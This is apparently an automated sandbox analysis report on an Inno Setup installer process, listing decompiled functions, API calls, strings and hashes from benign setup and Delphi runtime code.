Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 8c7d597c29a03ef98b73ffdf2240034f553e37ed67633844407f3f811d289582
Instruction ID: f2ce5095f23ab47d6d0538cc62e5ab7c2440563574ca3b0be4b951cff116fd36
Opcode Fuzzy Hash: 8c7d597c29a03ef98b73ffdf2240034f553e37ed67633844407f3f811d289582
Instruction Fuzzy Hash: 1A519375A041069BCB10FBA9C5825AFB3A5EF85308B20447BE941B73E7DB3C9E02965D

Uniqueness

Uniqueness Score: -1.00%

Function 00409D3C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00409D3C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
				char _v632;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x409ef7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffd8c;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x412c04; // 0x406bac
					E004063E4(_t52,  &_v8);
				} else {
					_t86 =  *0x412c80; // 0x406ba4
					E004063E4(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105) == 0) {
					_v628 =  *(_t89 + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t110;
					_v608 = 5;
					_push( &_v628);
					_t60 =  *0x412c0c; // 0x406b4c
					E004063E4(_t60,  &_v632, 2);
					E00409860(_t89, _v632, 1, _t108, _t110);
				} else {
					_v592 =  *(_t89 + 0xc);
					_v588 = 5;
					E00404E50( &_v600, 0x105,  &_v558);
					E00408028(_v600,  &_v596);
					_v584 = _v596;
					_v580 = 0x11;
					_v576 = _v8;
					_v572 = 0x11;
					_v568 = _t110;
					_v564 = 5;
					_push( &_v592);
					_t82 =  *0x412c38; // 0x406c1c
					E004063E4(_t82,  &_v604, 3);
					E00409860(_t89, _v604, 1, _t108, _t110);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E00409EFE);
				L00404C88( &_v632);
				L00404C90( &_v604, 3);
				return L00404C88( &_v8);
			}

0x00409d3c
0x00409d49
0x00409d4f
0x00409d55
0x00409d5b
0x00409d61
0x00409d66
0x00409d67
0x00409d6c
0x00409d6f
0x00409d75
0x00409d7c
0x00409d90
0x00409d95
0x00409d7e
0x00409d81
0x00409d86
0x00409d86
0x00409d9a
0x00409da7
0x00409db3
0x00409e6f
0x00409e75
0x00409e7f
0x00409e85
0x00409e8c
0x00409e92
0x00409e9f
0x00409ea8
0x00409ead
0x00409ebf
0x00409dd6
0x00409dd9
0x00409ddf
0x00409df7
0x00409e08
0x00409e13
0x00409e19
0x00409e23
0x00409e29
0x00409e30
0x00409e36
0x00409e43
0x00409e4c
0x00409e51
0x00409e63
0x00409e68
0x00409ec8
0x00409ecb
0x00409ece
0x00409ed9
0x00409ee9
0x00409ef6

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,00409EF7), ref: 00409DA7
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,00409EF7), ref: 00409DC9

Part of subcall function 004063E4: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00406429

Strings

u@, xrefs: 00409E5E, 00409EBA
Lk@, xrefs: 00409EA8

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: Lk@$u@
API String ID: 902310565-2376058283
Opcode ID: 6259ec6f591da9e1ad7678461e817eadaff81f7ebf4198e2adecfced6dfa1836
Instruction ID: 1a931a7164946d0945ddcf4ea47e041f34baee353206f071f8388db194c629b8
Opcode Fuzzy Hash: 6259ec6f591da9e1ad7678461e817eadaff81f7ebf4198e2adecfced6dfa1836
Instruction Fuzzy Hash: 47412B309042589FDB60EF65CD89BCDB7F4AB48304F1145EAA908F7292E7789E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A186, Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A186() {
				LONG* _t9;
				void* _t10;
				void* _t11;

				_t10 = 0;
				_t11 = 0x20;
				_t9 = 0x415ca4;
				while( *_t9 != 0 || InterlockedCompareExchange(_t9, 1, 0) != 0) {
					_t9 =  &(_t9[2]);
					_t11 = _t11 - 1;
					if(_t11 != 0) {
						continue;
					} else {
						if(_t10 == 0) {
							_t10 = CreateEventW(0, 0, 0, 0);
						}
						ResetEvent(_t10);
					}
					L10:
					return _t10;
				}
				if(_t9[1] == 0) {
					_t9[1] = CreateEventW(0, 0, 0, 0);
				}
				_t3 =  &(_t9[1]); // 0x0
				_t10 =  *_t3;
				goto L10;
			}

0x0040a18b
0x0040a18d
0x0040a192
0x0040a197
0x0040a1c5
0x0040a1c8
0x0040a1c9
0x00000000
0x0040a1cb
0x0040a1cd
0x0040a1dc
0x0040a1dc
0x0040a1df
0x0040a1df
0x0040a1e4
0x0040a1e9
0x0040a1e9
0x0040a1ae
0x0040a1bd
0x0040a1bd
0x0040a1c0
0x0040a1c0
0x00000000

APIs

InterlockedCompareExchange.KERNEL32(00415CA4,00000001,00000000), ref: 0040A1A1
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00415CA4,00000001,00000000), ref: 0040A1B8
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040A1D7
ResetEvent.KERNEL32(00000000), ref: 0040A1DF

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$Create$CompareExchangeInterlockedReset
String ID:
API String ID: 2790937731-0
Opcode ID: 85bf60a57223efc1bd127b854e8e2fcc91d5941f498f3bc83f799df80e1b8357
Instruction ID: e519d750d6dcafecf1b76c6a1b6cc8191a637c52d9ce77022197b424e8f1bcef
Opcode Fuzzy Hash: 85bf60a57223efc1bd127b854e8e2fcc91d5941f498f3bc83f799df80e1b8357
Instruction Fuzzy Hash: 2EF05E31780300AAFB316A164C82B2765568BD0B65F254037FA08BE2C2E6BDAC20416E

Uniqueness

Uniqueness Score: -1.00%

Function 00408F68, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106
threadCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00408F68(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t53;
				void* _t54;
				intOrPtr _t80;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t87;
				intOrPtr _t90;

				_t89 = _t90;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t90);
				_push(0x40907b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				_v8 = GetThreadLocale();
				_t53 = 1;
				_t86 = 0x415b98;
				_t83 = 0x415bc8;
				do {
					_t3 = _t53 + 0x44; // 0x45
					E00408F2C(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
					E00404C98(_t86, _v16);
					_t6 = _t53 + 0x38; // 0x39
					E00408F2C(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
					E00404C98(_t83, _v20);
					_t53 = _t53 + 1;
					_t83 = _t83 + 4;
					_t86 = _t86 + 4;
				} while (_t53 != 0xd);
				_t54 = 1;
				_t87 = 0x415bf8;
				_t84 = 0x415c14;
				do {
					_t8 = _t54 + 5; // 0x6
					asm("cdq");
					_v12 = _t8 % 7;
					E00408F2C(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
					E00404C98(_t87, _v24);
					E00408F2C(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
					E00404C98(_t84, _v28);
					_t54 = _t54 + 1;
					_t84 = _t84 + 4;
					_t87 = _t87 + 4;
				} while (_t54 != 8);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(E00409082);
				return L00404C90( &_v28, 4);
			}

0x00408f69
0x00408f6d
0x00408f6e
0x00408f6f
0x00408f70
0x00408f71
0x00408f72
0x00408f78
0x00408f79
0x00408f7e
0x00408f81
0x00408f89
0x00408f8c
0x00408f91
0x00408f96
0x00408f9b
0x00408faa
0x00408fae
0x00408fb9
0x00408fcd
0x00408fd1
0x00408fdc
0x00408fe1
0x00408fe2
0x00408fe5
0x00408fe8
0x00408fed
0x00408ff2
0x00408ff7
0x00408ffc
0x00408ffc
0x00409004
0x00409007
0x0040901f
0x0040902a
0x00409044
0x0040904f
0x00409054
0x00409055
0x00409058
0x0040905b
0x00409062
0x00409065
0x00409068
0x0040907a

APIs

GetThreadLocale.KERNEL32(00000000,0040907B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408F84

Strings

l@, xrefs: 00409011
$l@, xrefs: 00408FA2

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: LocaleThread
String ID: $l@$l@
API String ID: 635194068-4225844758
Opcode ID: 2e04514abfb8c49145987658e143d38efe1e1c455c6006f5a4294f9294b84c0e
Instruction ID: 74ee3e2f097acfc3ea8ee091fc7cdb976d8602175913d475df625015d87764a0
Opcode Fuzzy Hash: 2e04514abfb8c49145987658e143d38efe1e1c455c6006f5a4294f9294b84c0e
Instruction Fuzzy Hash: F6318771F045046BDB04EB99C881AAF77AAD788314F51843BFA05E7381DA39AD418769

Uniqueness

Uniqueness Score: -1.00%

Function 00409D3A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00409D3A(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
				char _v632;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x409ef7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffd8c;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x412c04; // 0x406bac
					E004063E4(_t52,  &_v8);
				} else {
					_t86 =  *0x412c80; // 0x406ba4
					E004063E4(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105) == 0) {
					_v628 =  *(_t89 + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t110;
					_v608 = 5;
					_push( &_v628);
					_t60 =  *0x412c0c; // 0x406b4c
					E004063E4(_t60,  &_v632, 2);
					E00409860(_t89, _v632, 1, _t108, _t110);
				} else {
					_v592 =  *(_t89 + 0xc);
					_v588 = 5;
					E00404E50( &_v600, 0x105,  &_v558);
					E00408028(_v600,  &_v596);
					_v584 = _v596;
					_v580 = 0x11;
					_v576 = _v8;
					_v572 = 0x11;
					_v568 = _t110;
					_v564 = 5;
					_push( &_v592);
					_t82 =  *0x412c38; // 0x406c1c
					E004063E4(_t82,  &_v604, 3);
					E00409860(_t89, _v604, 1, _t108, _t110);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E00409EFE);
				L00404C88( &_v632);
				L00404C90( &_v604, 3);
				return L00404C88( &_v8);
			}

0x00409d3a
0x00409d49
0x00409d4f
0x00409d55
0x00409d5b
0x00409d61
0x00409d66
0x00409d67
0x00409d6c
0x00409d6f
0x00409d75
0x00409d7c
0x00409d90
0x00409d95
0x00409d7e
0x00409d81
0x00409d86
0x00409d86
0x00409d9a
0x00409da7
0x00409db3
0x00409e6f
0x00409e75
0x00409e7f
0x00409e85
0x00409e8c
0x00409e92
0x00409e9f
0x00409ea8
0x00409ead
0x00409ebf
0x00409dd6
0x00409dd9
0x00409ddf
0x00409df7
0x00409e08
0x00409e13
0x00409e19
0x00409e23
0x00409e29
0x00409e30
0x00409e36
0x00409e43
0x00409e4c
0x00409e51
0x00409e63
0x00409e68
0x00409ec8
0x00409ecb
0x00409ece
0x00409ed9
0x00409ee9
0x00409ef6

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,00409EF7), ref: 00409DA7
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,00409EF7), ref: 00409DC9

Part of subcall function 004063E4: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00406429

Strings

u@, xrefs: 00409E5E

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: u@
API String ID: 902310565-3232061631
Opcode ID: 803c9cc7856af3ac950bd715bc8bc3bbbc638ef6bdeafcb244893eb738825441
Instruction ID: ca758b4f96bfb77009ae275c47d805f447a219e65d8d40a01463ddbbb4a05e8c
Opcode Fuzzy Hash: 803c9cc7856af3ac950bd715bc8bc3bbbc638ef6bdeafcb244893eb738825441
Instruction Fuzzy Hash: 0A313C709002589FDB60EF64CC85B8AB7F8EB48304F0144EAA508F7281E7789E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE68, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040EE68(void* __ecx) {
				char _v8;
				intOrPtr _t17;
				intOrPtr _t20;

				_push(0);
				_push(_t20);
				 *[fs:eax] = _t20;
				E00404CEC( &_v8, L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n\r\nFor more detailed information, please visit http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline",  *[fs:eax]);
				MessageBoxW(0, E00404D24(_v8), L"Setup", 0x10);
				_t17 = 0x40eeb5;
				 *[fs:eax] = _t17;
				_push(E0040EEBC);
				return L00404C88( &_v8);
			}

0x0040ee6b
0x0040ee6f
0x0040ee78
0x0040ee83
0x0040ee9a
0x0040eea1
0x0040eea4
0x0040eea7
0x0040eeb4

APIs

MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 0040EE9A

Strings

Setup, xrefs: 0040EE8A
The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 0040EE7E

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Message
String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
API String ID: 2030045667-2353098591
Opcode ID: 3f22f5bdfd00b5526a11fead451ef0713966d62effaaaaed0f75cf52d05feab8
Instruction ID: 0883e15896c4b772834ba87302cf9c47b33127b330fab632c4ce07624bd07afc
Opcode Fuzzy Hash: 3f22f5bdfd00b5526a11fead451ef0713966d62effaaaaed0f75cf52d05feab8
Instruction Fuzzy Hash: 02E0657424820CAAF301B652DD13F5AB69CD788B04F62487BF900B19C1D6B95E109468

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABF8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ABF8() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E00406728(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x412810 = _t1;
				}
				if( *0x412810 == 0) {
					 *0x412810 = E00408068;
					return E00408068;
				}
				return _t1;
			}

0x0040abfe
0x0040ac03
0x0040ac07
0x0040ac0f
0x0040ac14
0x0040ac14
0x0040ac20
0x0040ac27
0x00000000
0x0040ac27
0x0040ac2d

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,004115E0,00000000,004115F3), ref: 0040ABFE

Part of subcall function 00406728: GetProcAddress.KERNEL32(?,0040BDAE), ref: 0040674C

Strings

GetDiskFreeSpaceExW, xrefs: 0040AC09
kernel32.dll, xrefs: 0040ABF9

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExW$kernel32.dll
API String ID: 1646373207-1127948838
Opcode ID: fe33998cc9cc36d521a582d18847cefbb746d69cd43996148563fe781e2b6cb8
Instruction ID: caf3bee2458b42963bc9357fb50682e39eca259f80fc94b3950681cf825eb87a
Opcode Fuzzy Hash: fe33998cc9cc36d521a582d18847cefbb746d69cd43996148563fe781e2b6cb8
Instruction Fuzzy Hash: 77D05E713083014FE3007BB06E8160A25C8A301309B029A3BA401B62D2C7FD4835875E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cexplorer.tmp PID: 6744 Parent PID: 6748 cexplorer.tmpCOMMON

Executed Functions

Function 004F2388, Relevance: 138.4, APIs: 22, Strings: 56, Instructions: 1906COMMON

Download Yara Rule

Strings

FILEEXISTS, xrefs: 004F23BC
REGWRITEBINARYVALUE, xrefs: 004F38CA
ISPOWERUSERLOGGEDON, xrefs: 004F39D9
CONVERTPERCENTSTR, xrefs: 004F2DB1
REGWRITEDWORDVALUE, xrefs: 004F37F5
REGQUERYBINARYVALUE, xrefs: 004F33BD
DIREXISTS, xrefs: 004F23F8
ADDQUOTES, xrefs: 004F2A4B
GETTEMPDIR, xrefs: 004F2BDF
GETSYSWOW64DIR, xrefs: 004F2B7B
REGWRITESTRINGVALUE, xrefs: 004F34CD
ISADMINLOGGEDON, xrefs: 004F39B5
REGQUERYSTRINGVALUE, xrefs: 004F3159
GETINIINT, xrefs: 004F24E4
REGQUERYMULTISTRINGVALUE, xrefs: 004F321C
REMOVEBACKSLASHUNLESSROOT, xrefs: 004F2A07
GETWINDIR, xrefs: 004F2B1F
REGDELETEKEYIFEMPTY, xrefs: 004F2F6F
DELETEINISECTION, xrefs: 004F286B
SETNTFSCOMPRESSION, xrefs: 004F3AE7
REGDELETEVALUE, xrefs: 004F2FCB
REGWRITEMULTISTRINGVALUE, xrefs: 004F36DD
SETINIINT, xrefs: 004F2711
GETSYSTEMDIR, xrefs: 004F2B4D
USINGWINNT, xrefs: 004F2D00
CHARLENGTH, xrefs: 004F3AA0
GETCMDTAIL, xrefs: 004F28F5
GETSHORTNAME, xrefs: 004F2AD3
REGKEYEXISTS, xrefs: 004F2DF2
GETUILANGUAGE, xrefs: 004F3A37
INIKEYEXISTS, xrefs: 004F25D4
REGGETSUBKEYNAMES, xrefs: 004F3071
SETINISTRING, xrefs: 004F268A
GETENV, xrefs: 004F28B1
FILECOPY, xrefs: 004F2D24
SETINIBOOL, xrefs: 004F278E
REMOVEBACKSLASH, xrefs: 004F29C3
GETINIBOOL, xrefs: 004F2569
REGDELETEKEYINCLUDINGSUBKEYS, xrefs: 004F2F13
GETINISTRING, xrefs: 004F2470
ISINISECTIONEMPTY, xrefs: 004F2636
REGVALUEEXISTS, xrefs: 004F2E70
ADDPERIOD, xrefs: 004F3A5C
DELETEINIENTRY, xrefs: 004F280B
ADDBACKSLASH, xrefs: 004F297F
REMOVEQUOTES, xrefs: 004F2A8F
REGQUERYDWORDVALUE, xrefs: 004F32DF
STRINGCHANGEEX, xrefs: 004F2C80
STRINGCHANGE, xrefs: 004F2C0D
REGGETVALUENAMES, xrefs: 004F30E5
GETSYSNATIVEDIR, xrefs: 004F2BA9
PARAMCOUNT, xrefs: 004F2923
REGWRITEEXPANDSTRINGVALUE, xrefs: 004F35F3
FONTEXISTS, xrefs: 004F39FD
FILEORDIREXISTS, xrefs: 004F2434
PARAMSTR, xrefs: 004F2947

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ADDBACKSLASH$ADDPERIOD$ADDQUOTES$CHARLENGTH$CONVERTPERCENTSTR$DELETEINIENTRY$DELETEINISECTION$DIREXISTS$FILECOPY$FILEEXISTS$FILEORDIREXISTS$FONTEXISTS$GETCMDTAIL$GETENV$GETINIBOOL$GETINIINT$GETINISTRING$GETSHORTNAME$GETSYSNATIVEDIR$GETSYSTEMDIR$GETSYSWOW64DIR$GETTEMPDIR$GETUILANGUAGE$GETWINDIR$INIKEYEXISTS$ISADMINLOGGEDON$ISINISECTIONEMPTY$ISPOWERUSERLOGGEDON$PARAMCOUNT$PARAMSTR$REGDELETEKEYIFEMPTY$REGDELETEKEYINCLUDINGSUBKEYS$REGDELETEVALUE$REGGETSUBKEYNAMES$REGGETVALUENAMES$REGKEYEXISTS$REGQUERYBINARYVALUE$REGQUERYDWORDVALUE$REGQUERYMULTISTRINGVALUE$REGQUERYSTRINGVALUE$REGVALUEEXISTS$REGWRITEBINARYVALUE$REGWRITEDWORDVALUE$REGWRITEEXPANDSTRINGVALUE$REGWRITEMULTISTRINGVALUE$REGWRITESTRINGVALUE$REMOVEBACKSLASH$REMOVEBACKSLASHUNLESSROOT$REMOVEQUOTES$SETINIBOOL$SETINIINT$SETINISTRING$SETNTFSCOMPRESSION$STRINGCHANGE$STRINGCHANGEEX$USINGWINNT
API String ID: 0-4234653879
Opcode ID: a945480764e2779a66c45309dbd594a5b6c1d8a4f108a4a625e16e06cfea8738
Instruction ID: 06c1d85061af696bd09a078e38a36f3b9d8d406c9c689b91f0db75d66c117d45
Opcode Fuzzy Hash: a945480764e2779a66c45309dbd594a5b6c1d8a4f108a4a625e16e06cfea8738
Instruction Fuzzy Hash: D6D23530B002585BCB10EF79CC91AAEB2A5AF99704F10857BF505E7346DA3CDE0ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 004CF440, Relevance: 79.7, APIs: 4, Strings: 41, Instructions: 983timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0047E6BC: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,00000000,00000000,004AE62F,00000000,004AE916,?,?,00000000,0050B17C), ref: 0047E6ED

LocalFileTimeToFileTime.KERNEL32(?,?,00000000,004D0589,?,00000000,004D05D4,?,00000000,004D0719,?,00000000,?,00000000,00000000,00000000), ref: 004CF6F0
CompareFileTime.KERNEL32(?,?,00000000,004D0589,?,00000000,004D05D4,?,00000000,004D0719,?,00000000,?,00000000,00000000,00000000), ref: 004CFAF5
CompareFileTime.KERNEL32(?,?,?,?,00000000,004D0589,?,00000000,004D05D4,?,00000000,004D0719,?,00000000,?,00000000), ref: 004CFB15

Strings

Version of existing file: (none), xrefs: 004CFAA3
Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 004CFA79
Non-default bitness: 32-bit, xrefs: 004CF651
@, xrefs: 004CF53D
User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 004CFC30
